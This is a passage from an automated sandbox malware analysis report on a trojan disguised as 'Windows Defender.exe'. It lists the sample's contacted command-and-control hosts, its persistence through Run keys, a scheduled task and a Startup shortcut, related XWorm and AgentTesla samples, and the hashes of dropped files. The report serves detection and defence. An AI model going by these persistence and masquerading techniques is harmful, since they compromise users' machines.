                                http://www.microsoft.cLpowershell.exe, 00000002.00000002.2355459322.000001B079E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2325444475.000001B061BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.000001850022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2349671307.000001B0719FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442787413.0000019F9E2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2588883813.000001851006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2325444475.000001B061991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.0000018500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.00000253893E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWindows Defender.exe, 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2325444475.000001B061991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.0000018500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.00000253893E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    208.95.112.1
                                    		ip-api.comUnited States
                                    		53334TUT-ASUStrue
                                    147.185.221.22
                                    		22.ip.gl.ply.ggUnited States
                                    		12087SALSGIVERUStrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1528948
                                    Start date and time:2024-10-08 14:01:11 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 33s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:23
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Windows Defender.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@20/21@2/2
                                    EGA Information:
                                    • Successful, ratio: 12.5%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 88
                                    • Number of non-executed functions: 6
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target Windows Defender.exe, PID 3532 because it is empty
                                    • Execution Graph export aborted for target Windows Defender.exe, PID 6360 because it is empty
                                    • Execution Graph export aborted for target Windows Defender.exe, PID 6552 because it is empty
                                    • Execution Graph export aborted for target Windows Defender.exe, PID 884 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 1320 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 5176 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 6904 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: Windows Defender.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    08:02:18API Interceptor61x Sleep call for process: powershell.exe modified
                                    08:03:26API Interceptor125x Sleep call for process: Windows Defender.exe modified
                                    14:03:17Task SchedulerRun new task: Windows Defender path: C:\Users\user\AppData\Local\Windows s>Defender.exe
                                    14:03:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Local\Windows Defender.exe
                                    14:03:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Local\Windows Defender.exe
                                    14:03:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    208.95.112.1scan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                    • ip-api.com/json/?fields=225545

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    s-part-0017.t-0009.t-msedge.netMessage_2551600.emlGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                    • 13.107.246.45
                                    Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 13.107.246.45
                                    po 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    20fUAMt5dL.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 13.107.246.45
                                    https://url.us.m.mimecastprotect.com/s/ilkSCZ6mm3hDOA2KCjhRFBSqQQ?domain=google.chGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    Qi517dNlNe.exeGet hashmaliciousStealcBrowse
                                    • 13.107.246.45
                                    SteamCleanz Marlborough Limited.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 13.107.246.45
                                    ip-api.comscan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    http://tcaconnect.ac-page.com/toronto-construction-association-inc/Get hashmaliciousUnknownBrowse
                                    • 51.77.64.70
                                    Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                    • 208.95.112.1
                                    22.ip.gl.ply.ggeFvQTTtxej.exeGet hashmaliciousNjratBrowse
                                    • 147.185.221.22
                                    wB5Gc9RKzG.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    TRXLoader.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    Bootstrapper.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    aimbot.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    XClient.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    Ozj6OxEatlic.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    Neverlose.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    Solara.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TUT-ASUSscan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                    • 208.95.112.1
                                    H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                    • 208.95.112.1
                                    SALSGIVERUSx2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.23
                                    e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                    • 147.185.221.22
                                    SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exeGet hashmaliciousNjratBrowse
                                    • 147.185.221.22
                                    1c8DbXc5r0.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.18
                                    PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                    • 147.185.221.21
                                    H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                    • 147.185.221.23
                                    A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                    • 147.185.221.23
                                    Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    H1N45BQJ8x.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.23

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows Defender.exe.log

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Windows Defender.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):654
                                    Entropy (8bit):5.380476433908377
                                    Encrypted:false
                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                    Malicious:true
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................

                                    C:\Users\user\AppData\Local\Temp\Log.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\Windows Defender.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):41
                                    Entropy (8bit):3.7195394315431693
                                    Encrypted:false
                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                    Malicious:false
                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mz3yklq.0er.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bgonc1e.axp.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kw2qyt5.pgg.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54gfknof.qbi.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arooirdp.yhs.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chzbvprm.k4n.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dti0ppf5.beu.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxmsxief.1od.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3fkp05t.ajq.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljtuef3l.sho.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2fs4jrv.0nb.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhpwirbc.ab4.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uc45zjc0.wd3.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtcjmwls.p0f.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

